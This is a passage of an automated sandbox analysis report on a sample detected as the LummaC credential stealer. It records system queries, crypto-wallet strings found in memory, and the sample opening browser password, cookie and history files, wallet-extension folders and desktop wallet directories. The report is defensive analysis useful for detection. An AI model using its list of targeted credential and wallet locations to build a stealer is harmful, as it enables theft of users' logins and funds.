            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002BE5F4 GetLocalTime,11_2_002BE5F4
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002BE652 GetUserNameW,11_2_002BE652
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_0029BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,11_2_0029BCD2
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: Process Memory Space: Hc.com PID: 7836, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Found many strings related to Crypto-Wallets (likely being stolen)
            Source: Hc.com, 0000000B.00000003.2067214936.00000000043A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: llets/Electrum-LTCIV
            Source: Hc.com, 0000000B.00000002.2324659198.0000000004363000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
            Source: Hc.com, 0000000B.00000002.2324147573.00000000019D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
            Source: Hc.com, 0000000B.00000002.2324659198.0000000004363000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: window-state.json
            Source: Hc.com, 0000000B.00000002.2324147573.00000000019D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
            Source: Hc.com, 0000000B.00000002.2324659198.0000000004363000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
            Source: Hc.com, 0000000B.00000002.2324147573.00000000019D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Tries to harvest and steal ftp login credentials
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Tries to steal Crypto Currency Wallets
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
